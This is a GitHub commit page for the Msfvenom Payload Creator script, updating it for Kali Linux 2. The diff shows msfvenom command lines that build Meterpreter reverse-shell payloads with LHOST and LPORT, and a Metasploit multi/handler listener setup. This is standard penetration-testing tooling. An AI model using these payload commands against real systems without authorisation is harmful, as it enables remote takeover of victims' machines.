Skip to content

Commit

Permalink
v1.3.3: Kali 2 support
Browse files Browse the repository at this point in the history
  • Loading branch information
g0tmi1k committed Nov 6, 2015
1 parent eca0d69 commit 28fef0a
Show file tree
Hide file tree
Showing 2 changed files with 8 additions and 8 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
A **quick** way to generate various "basic" Meterpreter payloads via `msfvenom` (part of the Metasploit framework).

![Msfvenom Payload Creator (MPC)](https://i.imgur.com/JwSYBRZ.png)

Expand All @@ -18,7 +18,7 @@ The only necessary input from the user should be **defining the payload** they w
* **Want to generate one of each payload? No issue!** Try: `loop`.
* **Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem**. Try: `batch` (for everything), `batch msf` (for every Meterpreter option), `batch staged` (for every staged payload), or `batch cmd stageless` (for every stageless command prompt)!

_Note: This will **not** try to bypass any anti-virus solutions._
_Note: This will **not** try to bypass any anti-virus solutions in any modes._

## Install

Expand Down
12 changes: 6 additions & 6 deletions mpc.sh
100755 → 100644
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
#!/bin/bash
#-Metadata----------------------------------------------------#
# Filename: mpc.sh (v1.3.2) (Update: 2015-08-17) #
# Filename: mpc.sh (v1.3.3) (Update: 2015-11-06) #
#-Info--------------------------------------------------------#
# Quickly generate Metasploit payloads using msfvenom. #
#-Author(s)---------------------------------------------------#
# g0tmilk ~ https://blog.g0tmi1k.com/ #
#-Operating System--------------------------------------------#
# Designed for & tested on: Kali Linux & Metasploit v4.11+ #
# Designed for & tested on: Kali Linux 2 & Metasploit v4.11+ #
#-Licence-----------------------------------------------------#
# MIT License ~ http://opensource.org/licenses/MIT #
#-Notes-------------------------------------------------------#
Expand Down Expand Up @@ -141,7 +141,7 @@ function doAction {

cat <<EOF > "${FILEHANDLE}"
#
# RUN: service postgresql start;service metasploit start; msfconsole -q -r "${FILENAME}"
# RUN: systemctl start postgresql; msfdb start; msfconsole -q -r "${FILEHANDLE}"
#
use exploit/multi/handler
set PAYLOAD ${PAYLOAD}
Expand Down Expand Up @@ -715,16 +715,16 @@ elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; t
CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} > '${OUTPATH}${TYPE}-${SHELL}-${STAGE}-${DIRECTION}-${METHOD}-${PORT}.${FILEEXT}'"
doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" "${DIRECTION}" "${STAGE}" "${METHOD}" "${VERBOSE}"

# Batch/Loop modes
## Batch/Loop modes
elif [[ "${BATCH}" == "true" || "${LOOP}" == "true" ]]; then
#SUCCESS=true
exit 0

# Blank input
## Blank input
elif [[ -z "${TYPE}" ]]; then
echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}"

# Unexected input
## Unexpected input
else
echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2
fi
Expand Down

0 comments on commit 28fef0a

Please sign in to comment.